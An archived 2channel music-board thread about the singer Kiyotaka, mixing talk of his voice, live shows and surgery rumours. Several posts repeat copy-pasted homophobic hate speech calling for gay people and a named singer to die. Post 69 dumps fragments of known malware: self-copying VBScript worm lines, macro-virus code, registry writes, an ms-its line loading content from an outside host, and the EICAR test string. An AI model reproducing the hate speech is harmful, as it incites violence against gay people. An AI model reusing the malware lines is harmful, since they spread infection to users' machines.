2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【マライア】 清貴 きよたか 【ホイッスル】

1 :NO MUSIC NO NAME:2006/04/10(月) 18:02:05 ID:uvbp8n3g
清貴のスレがないんで立ててみました。
歌い方が好みじゃない。。

2 :NO MUSIC NO NAME:2006/04/10(月) 18:03:22 ID:uvbp8n3g
公式サイト
http://www.g-glamour.com/kiyotaka

3 :NO MUSIC NO NAME:2006/04/10(月) 19:53:53 ID:f5fVUqTx
昔は好きだったけど、いつの間にか聴かなくなった。
歌唱力が落ちたとか聞いたんだけど真偽は?

4 :NO MUSIC NO NAME:2006/04/11(火) 04:15:27 ID:NeAg+dKJ
落ちたよ。最初からあんまり上手くなかったけど。
あれを上手いと言う香具師は本物を聞いたことがないんだね。
デビュー時からそんなに上手くなかったけど、さらに悪化した。
そんなかんじ。売れなくて当然かと。

5 :NO MUSIC NO NAME:2006/04/11(火) 06:05:50 ID:qypcfkWY
まだこの人いるの?

6 :NO MUSIC NO NAME:2006/04/11(火) 08:41:22 ID:NeAg+dKJ
消えたよ。

7 :NO MUSIC NO NAME:2006/04/11(火) 11:49:47 ID:H8UGQLIZ
デビュー当時はフェイクやソウル節でうまくきこえさせてたのみ。
声じたい厚みがなく、声量もない、表現力もないかんじだった。
生で歌うと音程もわるかったし。

最近はフェイク、ソウル節はやめてストレートに歌ってるが
声質じたいが魅力ないので、ますますだめに。
本人は感情をこめてうたってるらしいが、歌が下手なので
だめだめだね。

8 :NO MUSIC NO NAME:2006/04/11(火) 12:05:00 ID:NeTsbrOk
>>7
ハゲドウ。この人なにより声が悪い。魅力ない。

9 :NO MUSIC NO NAME:2006/04/11(火) 15:03:31 ID:bWcNJ8VL
初期はそこそこ声量あった。
今は糞。

10 :NO MUSIC NO NAME:2006/04/11(火) 22:33:31 ID:4Qht9XQw
目の前で(1b以内)清貴の歌聞いた事あるけど、声量はあまりない様に聞こえた。でも、本人はめちゃくちゃかっこよかった☆ジャケ写とかなり違った!

11 :NO MUSIC NO NAME:2006/04/12(水) 02:42:35 ID:lxh/FKCR
この人整形したよね。デビューと今じゃ目が全然違う。

12 :NO MUSIC NO NAME:2006/04/12(水) 22:39:21 ID:ZfaqPDFS
138 :NO MUSIC NO NAME:2006/04/10(月) 19:44:26 ID:f5fVUqTx
ホモは信仰宗教に関わらず出生と共に原罪を背負った醜き汚物
徳のある人間に対する公害
早く死ねよ汚物平井ゲイ


13 :NO MUSIC NO NAME:2006/04/12(水) 23:40:57 ID:geKwEJ96
え、清春じゃないの?

14 :NO MUSIC NO NAME:2006/04/12(水) 23:43:51 ID:2TtN+A9Z
>>13
だっはぁ〜〜あぁああぁあぁ〜(ホイッスル)アイドンワナ〜
の人

15 ::2006/04/13(木) 01:21:29 ID:m5VNMeUH
アイドンワナ以降がとくにキモイよね。
この人、感情を込めるととてつもなくキモイ歌い方になる。
だからThe Only Oneは前半はましだけど後半がほんとに嫌い。

ちなみにここアンチトピです。

16 :NO MUSIC NO NAME:2006/04/13(木) 01:49:15 ID:sV262eWU
>>15
ホイッスルの後のアイドンワナ〜が妙におっさん臭いのがいつ聴いても笑えますよね

17 :1(=4=6=8=11=15):2006/04/13(木) 02:38:51 ID:scX04j+j
>>16
そうそう。この人の歌自体がギャグとしか思えない。。
こんなものCD化して公共の電波で流すこと自体公害に近い。
まだ浜崎やモー娘のほうがまし。

18 :NO MUSIC NO NAME:2006/04/13(木) 03:26:26 ID:ni5q4Lri
どうでもいいけど
このスレ私怨としか思えないんだが

19 :NO MUSIC NO NAME:2006/04/13(木) 07:52:42 ID:p0Bppyrx
べつに私怨じゃないけど?
ただ単に清貴のスレがなかったんで。
ファンの人の書き込みも別にいいですよ。

20 :NO MUSIC NO NAME:2006/04/13(木) 11:24:43 ID:ySDPPLs0
と言うよりスレが立っては消えを繰り返されてる気がする。俺は好きだけどね。あんま話題がないからすぐ落ちちゃうんだよ

21 :NO MUSIC NO NAME:2006/04/13(木) 16:47:40 ID:x53kXGHr
>>5
2 :NO MUSIC NO NAME:2006/04/11(火) 06:06:36 ID:qypcfkWY
だれが!?
NO MUSIC NO NAME:2006/04/11(火) 06:21:22 ID:qypcfkWY
ルナシーがだんだん


むなしー

に感じるリュウイチ節
NO MUSIC NO NAME:2006/04/11(火) 06:22:56 ID:qypcfkWY
妖怪大戦争!
NO MUSIC NO NAME:2006/04/11(火) 06:18:03 ID:qypcfkWY
友達なんか気にするな、自分の気持ちだ
NO MUSIC NO NAME:2006/04/11(火) 06:15:21 ID:qypcfkWY
したくないなあ…。血痕。
NO MUSIC NO NAME:2006/04/11(火) 06:09:01 ID:qypcfkWY
みんなそうだよ
NO MUSIC NO NAME:2006/04/11(火) 06:03:28 ID:qypcfkWY
いっぱいあるね
NO MUSIC NO NAME:2006/04/11(火) 06:17:09 ID:qypcfkWY


残念!
NO MUSIC NO NAME:2006/04/11(火) 06:08:07 ID:qypcfkWY
アニメ歌手ですか?
NO MUSIC NO NAME:2006/04/11(火) 06:13:24 ID:qypcfkWY
えっ!ほんまに?
12 :NO MUSIC NO NAME:2006/04/11(火) 06:04:11 ID:qypcfkWY
あたしも!
13 :NO MUSIC NO NAME:2006/04/11(火) 05:56:22 ID:qypcfkWY
はい、自演

22 :NO MUSIC NO NAME:2006/04/13(木) 17:11:02 ID:sV262eWU
>>20
とはいえ、半年以上清貴のスレなかったけどね

23 :NO MUSIC NO NAME:2006/04/13(木) 19:00:32 ID:rr7MgzhY
目の整形疑惑が出てるけど、目よりアゴを治した気が…デビュー当時の横顔の写真はアゴ出てるけど、実際は全然出てなかった

24 :NO MUSIC NO NAME:2006/04/14(金) 03:03:21 ID:qjPEihbi
>22
半年以上もなかったのか。なぜか男性アイドルのとこにスレがあってビックリしたよ。アイドルではないよな。

25 :NO MUSIC NO NAME:2006/04/14(金) 13:27:43 ID:mfD+wBr9
CD聴く限りではCHEMISTRYやEXILEよりは断然うまかった。

26 :NO MUSIC NO NAME:2006/04/15(土) 01:53:31 ID:ogwuP64v
>>14
183 :NO MUSIC NO NAME:2006/04/12(水) 01:27:51 ID:2TtN+A9Z
ホモは信仰宗教に関わらず出生と共に原罪を背負った醜き汚物
徳のある人間に対する公害
早く死ねよ汚物平井ゲイ


184 :NO MUSIC NO NAME:2006/04/12(水) 01:28:47 ID:2TtN+A9Z
ホモがメディアに露出し、夥しい恐怖を現代大衆社会の中核を成す中流階級の知識人へ
与えている時点で即刻差別され、人格に関わらず抹殺されるべきだろうがカス
ホモをどう肯定的に解釈しようが社会的動物である人間に対する公害だ
活発印刷を発明してから支配的だった活字メディアに必須だった抽象的・観念的イメージ
を覆したテレビ・ラジオにホモが何の束縛も受けず出演している時点で日本社会は
根本から間違っている





不浄の塊であるホモは今すぐ死ね





ましてメディアに露出するホモ、すなわち洗脳的音楽を中流階級の知識人に流し、
深層的恐怖を無意識のうちに植え付ける平井ゲイは中流知識人の手によって今すぐ抹殺
されるべきだ








早く死ねよ汚物 平井ゲイ


27 :NO MUSIC NO NAME:2006/04/15(土) 01:55:15 ID:ogwuP64v
>>14
188 :NO MUSIC NO NAME:2006/04/12(水) 06:48:36 ID:2TtN+A9Z
ホモは信仰宗教に関わらず出生と共に原罪を背負った醜き汚物
徳のある人間に対する公害
早く死ねよ汚物平井ゲイ


189 :NO MUSIC NO NAME:2006/04/12(水) 06:49:40 ID:2TtN+A9Z


ホモがメディアに露出し、夥しい恐怖を現代大衆社会の中核を成す中流階級の知識人へ
与えている時点で即刻差別され、人格に関わらず抹殺されるべきだろうがカス
ホモをどう肯定的に解釈しようが社会的動物である人間に対する公害だ
活発印刷を発明してから支配的だった活字メディアに必須だった抽象的・観念的イメージ
を覆したテレビ・ラジオにホモが何の束縛も受けず出演している時点で日本社会は
根本から間違っている





不浄の塊であるホモは今すぐ死ね





ましてメディアに露出するホモ、すなわち洗脳的音楽を中流階級の知識人に流し、
深層的恐怖を無意識のうちに植え付ける平井ゲイは中流知識人の手によって今すぐ抹殺
されるべきだ








早く死ねよ汚物 平井ゲイ


28 :NO MUSIC NO NAME:2006/04/15(土) 02:06:07 ID:ogwuP64v
>>16 >>22
【大いなる】松山千春【愛よ夢よ】
http://music5.2ch.net/test/read.cgi/musicjm/1115827732/364
364 :NO MUSIC NO NAME:2006/04/13(木) 16:44:58 ID:sV262eWU
やっぱり「恋」が一番好きかな。カラオケでは必須。

29 :NO MUSIC NO NAME:2006/04/15(土) 02:07:27 ID:ogwuP64v
>>16 >>22
216 :NO MUSIC NO NAME:2006/04/13(木) 02:11:15 ID:sV262eWU
ホモがメディアに露出し、夥しい恐怖を現代大衆社会の中核を成す中流階級の知識人へ
与えている時点で即刻差別され、人格に関わらず抹殺されるべきだろうがカス
ホモをどう肯定的に解釈しようが社会的動物である人間に対する公害だ
活発印刷を発明してから支配的だった活字メディアに必須だった抽象的・観念的イメージ
を覆したテレビ・ラジオにホモが何の束縛も受けず出演している時点で日本社会は
根本から間違っている





不浄の塊であるホモは今すぐ死ね





ましてメディアに露出するホモ、すなわち洗脳的音楽を中流階級の知識人に流し、
深層的恐怖を無意識のうちに植え付ける平井ゲイは中流知識人の手によって今すぐ抹殺
されるべきだ








早く死ねよ汚物 平井ゲイ
http://music5.2ch.net/test/read.cgi/musicjm/1144317907/216
http://music5.2ch.net/test/read.cgi/musicjm/1144317907/221
http://music5.2ch.net/test/read.cgi/musicjm/1144317907/235

30 :NO MUSIC NO NAME:2006/04/15(土) 19:39:59 ID:ZnHRuz7r
清貴は出身は仙台だったっけ?
二度ほど行ったけどあそこはいいところだね。中心街は都会だけど綺麗だし。

31 :NO MUSIC NO NAME:2006/04/15(土) 22:30:39 ID:ogwuP64v
>>30
【大いなる】松山千春【愛よ夢よ】
http://music5.2ch.net/test/read.cgi/musicjm/1115827732/l50

379 :NO MUSIC NO NAME:2006/04/15(土) 13:57:19 ID:ogwuP64v
>>374
平井スレ荒らしてる人間が他スレで良い住人ぶってヲタやってるのはおかしいだろ?
381 :NO MUSIC NO NAME:2006/04/15(土) 18:19:07 ID:ZnHRuz7r
>>379
平井が嫌いなんだからしょうがないだろうがカス

http://music5.2ch.net/test/read.cgi/musicjm/1144317907/330-334
http://music5.2ch.net/test/read.cgi/musicjm/1144317907/326

32 :NO MUSIC NO NAME:2006/04/16(日) 00:55:08 ID:WZu09o4Y
>>30
385 名前:NO MUSIC NO NAME :2006/04/15(土) 22:33:42 ID:ogwuP64v
>>381
【マライア】 清貴 きよたか 【ホイッスル】
http://music5.2ch.net/test/read.cgi/musicjm/1144659725/l50

30 名前:NO MUSIC NO NAME :2006/04/15(土) 19:39:59 ID:ZnHRuz7r
清貴は出身は仙台だったっけ?
二度ほど行ったけどあそこはいいところだね。中心街は都会だけど綺麗だし。

他スレではコピペ荒らしして自分のスレでは良い住人ぶるって迷惑だよ
松山・清貴ヲタが迷惑するだろ
糞ガキがっwww


386 名前:NO MUSIC NO NAME :2006/04/15(土) 22:56:16 ID:ZnHRuz7r
>>385
他スレで良い住人ぶると言いますが、普通に接してるまでですよ。

ゲイには牙をむきますけどね。ゲイが何の拘束束縛を受けずにエンターテイメントに
参加してるのが許せないのです。

はっきり言ってゲイ以外の歌手で嫌いな歌手なんかほとんどいませんよ。

33 :NO MUSIC NO NAME:2006/04/22(土) 20:36:17 ID:mtnZj+GQ
>>30
381 :NO MUSIC NO NAME:2006/04/15(土) 18:19:07 ID:ZnHRuz7r
>>379
平井が嫌いなんだからしょうがないだろうがカス
386 :NO MUSIC NO NAME:2006/04/15(土) 22:56:16 ID:ZnHRuz7r
>>385
他スレで良い住人ぶると言いますが、普通に接してるまでですよ。

ゲイには牙をむきますけどね。ゲイが何の拘束束縛を受けずにエンターテイメントに
参加してるのが許せないのです。

はっきり言ってゲイ以外の歌手で嫌いな歌手なんかほとんどいませんよ。
464 :NO MUSIC NO NAME:2006/04/15(土) 07:50:54 ID:ZnHRuz7r
俺も知りたい
いつも隆ちゃん隆ちゃん言ってる人、レポして!
468 :NO MUSIC NO NAME:2006/04/15(土) 19:35:11 ID:ZnHRuz7r
そういえばレースやってたね。

カバーアルバムが楽しみだ。隆一のオリビアとか聴いてみたい。
627 :NO MUSIC NO NAME:2006/04/15(土) 19:37:33 ID:ZnHRuz7r
ホモは死ねよ
298 :NO MUSIC NO NAME:2006/04/15(土) 07:53:39 ID:ZnHRuz7r
>>286
三重だろ

34 :NO MUSIC NO NAME:2006/04/24(月) 11:55:57 ID:M0G0fjj2
ノノノ ドンクライ ノォ〜モァー

35 :NO MUSIC NO NAME:2006/05/04(木) 10:45:23 ID:L+mEv32c
方角板にスレが建ったと思ったらアンチかよ 消えかけてるのに物ずきねぇ

36 :NO MUSIC NO NAME:2006/05/05(金) 03:17:46 ID:YOP2nU+o
実際に知ってる人いんの?

37 :NO MUSIC NO NAME:2006/05/11(木) 23:32:15 ID:/LDULuAA
ブログの画像、マジ整形した?鼻高くなってね?

38 :NO MUSIC NO NAME:2006/05/12(金) 06:41:29 ID:5+Hh+I4D
弟の方がイケメン☆

39 :NO MUSIC NO NAME:2006/05/12(金) 14:07:34 ID:NNWnTL50
>>38 しってんの?

40 :NO MUSIC NO NAME:2006/05/13(土) 15:33:48 ID:O33PJjh5
今日ライブなのに誰も書き込んでないのか〜

41 :NO MUSIC NO NAME:2006/05/13(土) 20:41:22 ID:rxPM8M0A
ライブどーだったのよ

42 :NO MUSIC NO NAME:2006/05/16(火) 05:17:22 ID:OPfW7l6e
原宿?

43 :NO MUSIC NO NAME:2006/05/22(月) 00:33:15 ID:nWrFAbu5
おちるわよ

44 :NO MUSIC NO NAME:2006/05/25(木) 18:11:52 ID:IhoVrPyB
俺ライブ行ったことあるけど、清貴歌唱力あるよ!他にカスみたいなのいっぱいいるだろ。 それにしても、曲ださないのかな。

45 :NO MUSIC NO NAME:2006/05/26(金) 12:59:26 ID:rJ0GUbeT
昔結構聞いてました!!!ホイッスルが魅力ですよね!!!

46 :NO MUSIC NO NAME:2006/05/28(日) 01:19:22 ID:RPUwS1tL
>>45
もう出なくなったけどな。

47 :NO MUSIC NO NAME:2006/05/28(日) 15:42:26 ID:RPUwS1tL
ttp://www.youtube.com/watch?v=eyHpflnmXuA
今はこういう曲調の方があってるかもな…。

48 :NO MUSIC NO NAME:2006/05/28(日) 21:16:29 ID:mz5uPMBi
今の劣化した声でさえ平井○んよりは良い(主観

49 :NO MUSIC NO NAME:2006/05/29(月) 13:00:43 ID:1K8gDU0r
飛来犬はジョン・レジェンドと仲よくして・・・

50 :NO MUSIC NO NAME:2006/05/31(水) 16:49:02 ID:oRYcz43C
出さなくなったんですか?もう出せなくなったんですか?

51 :NO MUSIC NO NAME:2006/05/31(水) 19:27:33 ID:tamyFBa/
出せないだと思う 

52 :NO MUSIC NO NAME:2006/06/03(土) 08:33:16 ID:WjBpArUX
ガビ〜ンorz

53 :NO MUSIC NO NAME:2006/06/05(月) 11:04:58 ID:qTy9HY0n
体調悪いのが原因だとしたら戻る可能性高いと思う
今はコンディションに合う歌を唄ってれば良い

54 :NO MUSIC NO NAME:2006/06/05(月) 18:18:41 ID:qTy9HY0n
大阪ライブおめ

55 :NO MUSIC NO NAME:2006/06/06(火) 23:15:50 ID:vxnGEkpR
大阪にくるんだ〜。
同世代だから一度見に行ってみようかな。

56 :NO MUSIC NO NAME:2006/06/08(木) 03:08:45 ID:KrN/rrEN
平井堅のFAVORITEとは?
5つの質問に答えてくれました!

最近よく聴く曲は何ですか?
嵐の「きっと大丈夫」。ホントにこの曲は名曲ですね。
大好きです!大好きすぎてカラオケで歌いまくってますから!!
振り付けもかなり好きなんですけど、
さすがに振りを付けては歌ってません(苦笑)。

好きな映画は何ですか?
最近めちゃくちゃ感動したのは『ALWAYS三丁目の夕日』ですね。
とにかく今まで観た映画の中で一番泣きました。
20分過ぎたあたりから最後まで、映画館の中で人目も気にせず
号泣してたんですよ。

ハマっている食べ物は何ですか?
エクレア。某コンビニで甘いものキャンペーンみたいなのをやっていて。
で、エクレア・シュークリーム・フェアがキラキラのディスプレイで
展開されているのを見て、つい買っちゃったらハマってしまいました。

よく見るWEBサイトはありますか?
僕はまったくパソコンを使ってないんですよ。なので、見るのは
携帯オンリーですね。たまに音楽情報とかチャートを見てる
ぐらいなんですけど(笑)。

夢は何ですか?
観葉植物をもっと増やしたい!引っ越しをしたので、その新しい
部屋やベランダにどーんと緑を増やしたくて。緑に癒されたいですね(笑)。
枯らさないようにちゃんと育てたいです。

WM - ミュージック -インタビュー&コメント
http://www.oricon.co.jp/music/interview/060607_01_03.html


57 :NO MUSIC NO NAME:2006/06/11(日) 15:50:29 ID:PlsPm4Vl
>>56
パソコン盗まれて、個人情報漏れちゃったから
怖くなって使ってないんだね
ホモ達に相当迷惑かけたのだろうか(笑)

58 :NO MUSIC NO NAME:2006/06/11(日) 19:06:37 ID:dOCeNZ10
遊びでいいから清貴に抱かれたい!

59 :NO MUSIC NO NAME:2006/06/16(金) 19:10:35 ID:KUIxJlPs
http://www.youtube.com/watch?v=eyHpflnmXuA&search=
岩崎宏美とduet
歌唱力比べたら天と地の差がある
2分7秒過ぎの
と〜ても〜ぉう〜♪のところなんか聞いてられない
感情込めて歌ってるか知らないが下手糞過ぎ

60 :NO MUSIC NO NAME:2006/06/18(日) 06:25:32 ID:vgH1LkII
本日は都内にてライブです

61 :NO MUSIC NO NAME:2006/06/18(日) 08:37:28 ID:fxpDhvLd
歌、ウマイよー。
今のペースでコンスタントにライブ続けて欲しいなー。


62 :NO MUSIC NO NAME:2006/06/19(月) 21:51:24 ID:X9xiwpw+
新曲どんなよ?

63 :NO MUSIC NO NAME:2006/06/19(月) 23:02:13 ID:GSTQxEiB
邦楽洋楽問わず聴きまくったが清貴の声は群を抜いて綺麗な声をしてると思う

声だけならいいんだけどそれをいかせてない希ガス

64 :NO MUSIC NO NAME:2006/06/26(月) 06:38:23 ID:BmVN3IVw
ライブ行った人?

65 :NO MUSIC NO NAME:2006/06/27(火) 19:34:59 ID:ShftUi73
>>63綺麗な声なら元Vlidgeの片方がすごいと思った

66 :NO MUSIC NO NAME:2006/06/28(水) 22:49:12 ID:ovS3VIyg
>>65
ぶりっじはキーが極端に高いだけで声は特に魅力的でない奇ガス。


67 :NO MUSIC NO NAME:2006/06/29(木) 00:51:23 ID:NQn81k2e
昔よく聴いてたけど結構いい声じゃなかった?
ドレッド頭じゃない方

68 :NO MUSIC NO NAME:2006/07/01(土) 11:42:54 ID:bB9xY54p
今日現在の中川晃教の方が断然上

69 :NO MUSIC NO NAME:2006/07/01(土) 12:13:31 ID:DuBxSCL4
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
ܷܵܶ

70 :NO MUSIC NO NAME:2006/07/02(日) 02:25:08 ID:yHa+rpLq
>>65
Vlidgeは声より80's洋楽っぽいサウンドが好きで聴いてた。

清貴昔好きだったけど
Just For You以降は詳細が全然わかんないよorz

71 :NO MUSIC NO NAME:2006/07/02(日) 07:22:18 ID:vF3kvEVE
The Only One
ホレました(*VεV*)

72 :NO MUSIC NO NAME:2006/07/03(月) 15:41:09 ID:mHZxzy2J
>>70
Vlidgeってクオリティ高い曲が多いよね。
メロディもトラックも。
清貴のStop On By聞いたけどあればダメだ。
歌い方が変わったのもそうだけど曲が全然ダメ。
やっぱり自作は向いてないのかな?

73 :NO MUSIC NO NAME:2006/07/04(火) 17:00:16 ID:jNKcM9IC
Vlidgeもだが、やはり日本の本格R&Bは売れないのか

74 :NO MUSIC NO NAME:2006/07/04(火) 18:25:48 ID:0Im8hKtp
清貴は本格R&Bじゃないよ 初期はプロデューサーのAORテイストだった

75 :NO MUSIC NO NAME:2006/07/08(土) 14:41:36 ID:oNtC7Xkg


76 :NO MUSIC NO NAME:2006/07/14(金) 23:21:15 ID:bA114QFR
age

77 :NO MUSIC NO NAME:2006/07/19(水) 02:17:12 ID:Y7i78/v0


78 :NO MUSIC NO NAME:2006/07/21(金) 12:20:21 ID:fJxcGBJl
いつになったらカミングアウトするのだろうか。。

79 :NO MUSIC NO NAME:2006/07/27(木) 01:20:05 ID:E7jk/2t0
しね

80 :NO MUSIC NO NAME:2006/07/27(木) 09:37:55 ID:LwNqv9eG
貴樹って何の曲でhihiC#出してるの?

81 :NO MUSIC NO NAME:2006/07/27(木) 13:59:38 ID:fzO3DMMO
>>80
それ誰だよ。

82 :NO MUSIC NO NAME:2006/07/28(金) 06:05:09 ID:nvw+Dssv
新曲でるね

83 :NO MUSIC NO NAME:2006/07/28(金) 08:39:44 ID:kOeyjGCi
マジ?ソースは

84 :NO MUSIC NO NAME:2006/07/29(土) 17:00:32 ID:FrzKphlp
>>82
ソース頼む。

85 :NO MUSIC NO NAME:2006/07/29(土) 21:56:34 ID:qQsWtaa4
今日の情熱大陸ライブで言ってた

86 :NO MUSIC NO NAME:2006/07/30(日) 20:36:40 ID:kDPHTBxR
d ライブどうだった?

87 :NO MUSIC NO NAME:2006/08/06(日) 00:36:50 ID:IJTlB4HD
8/30 「Ocean Blue」
情熱の前からちゃんと情報出てたけどな。

今日はイマイチだったな。あんまり声出てなかった?
アンジェラ・アキがいい歌唄ってたから、余計ショボく感じた。
新曲のサビのいい感じの高音裏声切り替えのところも安定してなかったし。

88 :NO MUSIC NO NAME:2006/08/06(日) 21:37:58 ID:L/Ts13U/
>>87
公式にも載ってたのね…
わざわざdクス。
曲はどうだった?
またポップ路線?

89 :NO MUSIC NO NAME:2006/08/07(月) 04:30:21 ID:TjdQrBwK
そうだね。どっちかっていうとポップ路線かな。
けど「大空へ」みたいな感じではなくて、
優しく、流れるような曲調だった。


サブステージのときはみんなトイレ行ったり売店行ったりで
立ってしまうのと、アンジェラ・アキで満足したのか
余計に席外してしまう人が多くて
あまり聴いてもらえてなかったのが残念だった。
惹きつけられなかったのも、またそれは実力だろうけどね。

けど本人はとても嬉しそうに楽しそうに歌っていたので良かったよ。
自分はファンだからってのもあるだろうけど
すごく心に響いたし、いいシチュエーションで
「大空へ」を歌ってる気持ち良さみたいなのが伝わってきた。
MCは「こんなにたくさんの人達の前で歌えて、本当に嬉しく思います。」
大空へ前MC「ずっとこんなシチュエーションで歌いたいと思っていた曲なので
今日こうして歌えることが嬉しいです。聴いてください。大空へ」
みたいな感じ。

レポ書いてる人の見たら、清貴の印象は
「白いタンクに白いズボンで爽やか(orそっち系ぽい)、楽しそうに唄ってた」
ってだけのがほとんどだった… orz

90 :NO MUSIC NO NAME:2006/08/08(火) 03:05:28 ID:Vw6t3/4n
>>89
こんなに詳しくありがとう。
いろいろ大変なんだろうけどがんばってるみたいだね。
新曲が楽しみ。

91 :NO MUSIC NO NAME:2006/08/12(土) 03:30:09 ID:+IlbUdHV
もう歌えない歌手の何所がいいんだ
清貴が辞めようか悩んだのは売れないからじゃなく歌えなくなったからだろ

92 :NO MUSIC NO NAME:2006/08/14(月) 10:19:51 ID:44E8ghUK
それでも彼は歌おうとしてるじゃん?
それを応援するのがファンでしょ。
確かに前よりも歌えなくはなったけど、彼の唄はすごく心に響くよ。

93 :NO MUSIC NO NAME:2006/08/14(月) 10:33:09 ID:NxAPEMvO
歌えないのに好きって歌手というよりアイドルだな だからババヲタしか居ないわけか
歌は技術が無いと歌えない おまいさんの心に響くのは、おまいさんが清貴をアイドル崇拝してるから
清貴をなんとも思わない音楽好きを振り向かせるのは容易でない 歌唱力以外に余程の魅力が無いとな
それも曲とか詞でなければ結局はアイドル それでも本人が幸せならいいのか
ま 頑張れ

94 :NO MUSIC NO NAME:2006/08/15(火) 00:08:45 ID:TSOKP5yf
悪いけど清貴のルックスとか全く興味ないし
崇拝どころかアイドル視してもないよwww
自分は曲も詩も好きだし、周りには20代の男の人のファンもいる。
勝手に決めつけないでよ。
ダンスも別にいらないし、キャーキャー騒いでるおばさん達を見たときは引いたし、仲良くなる気もない。

もちろんある程度は必要あるけど、心に響く歌を唄って
伝えることができるのは技術だけではないと思うよ。
それにそこまで言われるほど歌えなくもない。
まぁメジャーに出ていってどうこうってことはないかもしれないけど
今のような活動でもいいから、歌を唄って聴かせてほしいから応援してるんだよ。
ファンクラブに入ったりの熱心なものではないけども。

てか、なんでその歌えない小物のスレまでわざわざ見に来て
そこまでこき下ろして、つっかかるのか理解できない。
あと言っておくけど、清貴が自分の一番好きなアーティストってわけでもないよ。

95 :NO MUSIC NO NAME:2006/08/15(火) 01:46:19 ID:yDl20VV8
?つっかかってなんかいないけど こき下ろしてもいないし
熱心でない割りに感情的になってる様に見えるけどな ファンなら応援するもんだとか決め付けてるように見えたが
自分は巧かった頃の清貴の歌のファンだから歌えなくなったのが残念だよ
貴方が好きなら、それでイインじゃない?気に入らない意見を目にしたくないのに2chに居るのが理解できんよ
自分で若い子が集まるようなファンサイトでも作ったら?清貴も喜ぶんじゃないの じゃ


96 :NO MUSIC NO NAME:2006/08/15(火) 02:34:15 ID:TSOKP5yf
どこがいいの?って発言に対してレスして、それに対して言われたことにまた返しただけだけど。
だからいいって言ってるのにアイドル視してるとか
自分の価値観だけで決め付けてくるのが嫌だったのと、熱くなる性格だからだよ。
年齢がどうとかじゃなくてキャーキャー言ってるのに興味がなくて、歌が好きってだけ。
そこまで熱心じゃないって言ってるじゃん。
もうこんな言い合いくだらないからいいわ。

97 :NO MUSIC NO NAME:2006/08/18(金) 14:20:32 ID:ug9u474j
過疎スレでもめないでくれ…
そんなことより新曲タイアップのCMうpされてるよ。

ttp://www.nippon-foundation.or.jp:8080/ramgen/real/2006557/2006557.rm

98 :NO MUSIC NO NAME:2006/08/18(金) 18:55:41 ID:70OQE5a4
それ聴く限り、いまいちだな
CDはアレンジ違うらしいが

99 :NO MUSIC NO NAME:2006/09/01(金) 13:51:13 ID:CDU671gQ
母校の文化祭でライブ&サイン会、CD販売なんてこの人も落ちぶれたものだね。
今もそこそこに人気があれば絶対に来ないよ。

100 :NO MUSIC NO NAME:2006/09/01(金) 20:01:59 ID:f8B6/laI
ブログに粘着荒らしが湧いてるようだが

101 :NO MUSIC NO NAME:2006/09/02(土) 01:11:00 ID:xmfdTSwM
で、新曲どうなの?

102 :NO MUSIC NO NAME:2006/09/02(土) 04:10:59 ID:9K7XAEuC
HMVで試聴できる

103 :NO MUSIC NO NAME:2006/09/04(月) 19:15:06 ID:GvBz3Ij0
二高のライブ行ってきたよ 
サイン会でヲタっぽい男が、しつこく話しかけてたけど嫌な顔一つせずに対応してた
良い奴だね

104 :NO MUSIC NO NAME:2006/09/11(月) 15:35:39 ID:A38Y603K
今日めっちゃ久しぶり3年ぶりくらいに1stアルバム聞いたから今は何してるんだろうと思ったら声出なくなってるのか…
結構上手かったから好きだったんだけどな〜
原因てなんなんだろね?

105 :NO MUSIC NO NAME:2006/09/11(月) 16:14:13 ID:qjnIJSAA
ホイッスルが出ないだけで声そのものは劣化してない


106 :NO MUSIC NO NAME:2006/09/11(月) 20:54:25 ID:SI1UdlVu
>>105
してるよ。
高音が全体的に出なくなってるし声量もない。
ビブラートも前以上に糞になった。
新曲聴いたらよくわかるよ。

107 :NO MUSIC NO NAME:2006/09/11(月) 21:58:49 ID:9DccO5Lq
生で聴いたら声は前より出てた ビブラートは確かに掛けてないね
波が大きいんだと思う

108 :NO MUSIC NO NAME:2006/09/12(火) 14:01:55 ID:j7FjckaI
インディーズレーベルらしいけどどこに所属してるの??

109 :NO MUSIC NO NAME:2006/09/12(火) 14:26:17 ID:5Srwh9QJ
http://blog.goo.ne.jp/bellwoodrecords/e/64a0086d74dd7830985e03c591076615

110 :NO MUSIC NO NAME:2006/09/13(水) 13:52:19 ID:JeypHi8N
>>107
そうなのか
けど最近は曲もしょぼいしなぁ。

111 :NO MUSIC NO NAME:2006/09/13(水) 16:07:07 ID:8MZ2GaBD
また黒っぽいの歌って欲しいね

112 :NO MUSIC NO NAME:2006/09/13(水) 22:58:10 ID:JeypHi8N
>>111
そうだよね。
それが魅力のひとつだったわけだし。

113 :NO MUSIC NO NAME:2006/09/14(木) 18:44:45 ID:WL+IdoiO
黒って?

114 :NO MUSIC NO NAME:2006/09/14(木) 20:16:30 ID:Z5tQqDPo
>>113
